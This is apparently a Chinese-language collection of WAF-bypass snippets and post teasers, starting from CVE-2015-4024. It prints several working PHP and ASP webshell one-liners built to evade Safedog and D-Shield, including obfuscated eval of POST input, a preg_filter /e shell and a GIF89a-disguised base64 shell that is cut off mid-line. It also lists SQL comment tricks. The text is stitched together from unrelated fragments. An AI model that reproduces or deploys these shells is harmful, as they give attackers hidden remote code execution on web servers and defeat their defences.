PHP绕过各种waf技巧-CVE-2015-4024

今天我们想从2015.04.03的一个PHP远程dos漏洞(CVE-2015-4024)说起。技术细节见如下链接,中文版:http://drops.wooyun.org/papers/6077,英文版 :https://bugs.php.net/bug.php?id=69364。因为php解析body part的header时进行字符串拼接,而拼接过程重复拷贝字符导致DOS。事实上该漏洞还有其他非dos的利用价值,其中之一,就是绕过当前各种云WAF的文件上传防御策略。

CKnife java版本的中国菜刀 可过各种waf狗

CKnife java版本菜刀

D盾的软肋 最新过D盾一句话

<?php $str_tmp = "eval"; $str_tmp .= "(";$str_tmp .= "$";$str_tmp .= "_PO";$str_tmp .= "ST[1]);";@eval($str_tmp); ?>

今日要分享的一句话:

<?php $ad = '|';$ad .='.';$ad .='*|';$ad .='e';@preg_filter('|.*|e', $_REQUEST['1'], ''); ?>

原创过狗php一句话

GIF89a
<?
$ran = 'cmFuZ2U=';
$ran1 = 'ba'.'se'.'64'.'_decode';
$int = $ran1($ran);
$int1 = $int(0,200);
$ch = 'c&#39

waf绕过的技巧

研究过国内外的waf。分享一些 奇淫绝技。

一些大家都了解的技巧如:/*!*/,SELECT[0x09,0x0A-0x0D,0x20,0xA0]xx FROM 不再重造轮子。

Mysql

过狗shell文件管理


过狗shell文件管理

asp过狗一句话

<%
i=(Chr(-12590))
love=(Chr(-20306))
you=(Chr(-15133))
OK=i&love&you
CNM=Request(OK)
eVal CNM 'pass:我爱你
%>

asp过狗一句话中文版的哦

过云盾、D盾各种盾php shell

<?php
 
//过云盾、D盾各种盾shell
$id = $_GET['id'];
//debug
echo $catid = isset($_GET['catid'])?base64_decode($_GET['catid']):'';
$s = '';

此时此刻怎能不打狗?

双十一不单单是程序猿的节日且更是安全狗的节日,三个月以前就说过挖到各种各样安全狗绕过方法了,一直没找到好的时间来发出来。那何不乘这个时候发出来让大家开心的过一个节日

WAF的XSS绕过姿势

由于应用防火墙的广泛使用,实验测试WAF抵御xss攻击的能力变的很有必要。当然所有的实验就是为了证明厂商要从根源上杜绝漏洞,不能躺在WAF上高枕无忧。

实验测试的对象是一些流行的WAF 例如F5 Big IP、Imperva Incapsula、AQTRONIX WebKnight、PHP-IDS、Mod-Security、Sucuri、QuickDefense、Barracuda WAF 他们都在测试中被绕过。